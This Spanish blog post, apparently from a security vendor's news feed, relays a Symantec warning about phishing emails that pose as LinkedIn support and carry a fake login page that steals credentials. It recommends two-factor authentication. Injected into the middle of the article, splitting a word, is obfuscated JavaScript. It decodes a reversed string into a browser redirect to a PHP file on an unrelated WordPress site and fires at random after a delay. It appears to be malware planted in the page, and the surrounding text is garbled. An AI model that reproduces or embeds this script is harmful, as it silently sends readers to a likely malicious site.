Cómo evitar correos falsos que dicen ser enviados por LinkedIn
Symantec es una corporación internacional que desarrolla y comercializa software para computadoras, particularmente en el dominio de la seguridad informática. Y en las últimas semanas dicha empresa ha detectado un incremento en los correos electrónicos falsos (phishing) que parecen ser enviados por el departamento de soporte técnico de LinkedIn.
Desde la empresa sugieren, entonces, realizar una actualización de seguridad obligatoria para la cuenta de LinkedIn del usuario que está recibiendo ese correo falso.
El correo menciona que para proteger la cuenta, se debe descargar un documento adjunto (archivo HTML) y seguir las instrucciones. El archivo adjunto al correo es una copia del sitio web real de LinkedIn.com. Sin embargo, en la copia, el código fuente está modificado para que cuando el usuario use esa página web para entrar a LinkedIn, sus credenciales de acceso sean enviadas directamente al atacante.
Curiosamente, el correo utiliza una letra “L” en minúscula, en vez de una “i” mayúscula en la palabra “Linkedln”. Esta pequeña diferencia es prácticamente imperceptible a la vista y funciona como una forma para evadir los filtros de correo electrónico.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tobiz.com.ar/data/img_cont/img_imagenes/img_gr/96427_52170.jpg” alt=”” width=”400″ height=”300″ /></p>
<p>Por eso, Symantec recomienda usar la autenticación de doble fac<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tor para reducir los riesgos. Al hacerlo, verdaderamente actualizarán la seguridad de su cuenta al agregar una capa adicional de protección. Con esta opción activada, un ciberatacante podría tener las credenciales de un usuario, pero para entrar a su cuenta necesitaría tener también acceso a su teléfono móvil.
Ver informacion original al respecto en Fuente:
ms, 26-1-2015
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.